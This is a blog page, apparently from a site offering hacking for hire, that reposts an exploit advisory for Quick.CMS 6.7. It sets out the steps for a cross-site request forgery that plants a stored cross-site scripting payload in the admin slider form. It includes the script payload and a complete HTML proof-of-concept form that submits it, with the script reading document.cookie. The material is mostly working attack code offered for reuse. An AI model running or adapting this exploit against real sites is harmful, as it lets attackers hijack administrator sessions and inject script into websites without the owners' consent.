Jump to content

Hacker Technology

A group blog by Leader in Hacker Website - Providing Professional Ethical Hacking Services

  • Entries

    16114

  • Comments

    7952

  • Views

    863551381

Contributors to this blog

  • HireHackking 16114

About this blog

Hacking techniques include penetration testing, network security, reverse cracking, malware analysis, vulnerability exploitation, encryption cracking, social engineering, etc., used to identify and fix security flaws in systems.

HireHackking 
# Exploit Title: Quick.CMS 6.7 - Cross Site request forgery (CSRF) to Cross-site Scripting (XSS) (Authenticated)
# Date: 21/04/2021
# Exploit Author: Rahad Chowdhury
# Vendor Homepage: https://opensolution.org/
# Software Link: https://opensolution.org/download/home.html?sFile=Quick.Cms_v6.7-en.zip
# Version: 6.7
# Tested on: Windows 8.1, Kali Linux, Burp Suite

Steps to Reproduce:

1. At first login to your panel
2. then click the "Sliders" menu to "New Slider"
3. now intercept with the burp suite and save a new slider
4. Then use XSS payload </textarea><script>alert(document.domain)</script> in sDescription value.
5. Now Generate a CSRF POC

<!DOCTYPE html>
<html>
<body>
  <form action="http://127.0.0.1/admin.php?p=sliders-form" method="POST">
    <input type="hidden" name="iSlider" value="">
    <input type="hidden" name="aFile" filename="">
    <input type="hidden" name="sFileNameOnServer" value="slider_2.jpg">
    <input type="hidden" name="sDescription"
value="test</textarea><script>alert(document.cookie)</script>">
    <input type="hidden" name="iPosition" value="1">
    <input type="hidden" name="sOption" value="save">
    <input type="submit" value="submit">
  </form>
</body>
</html>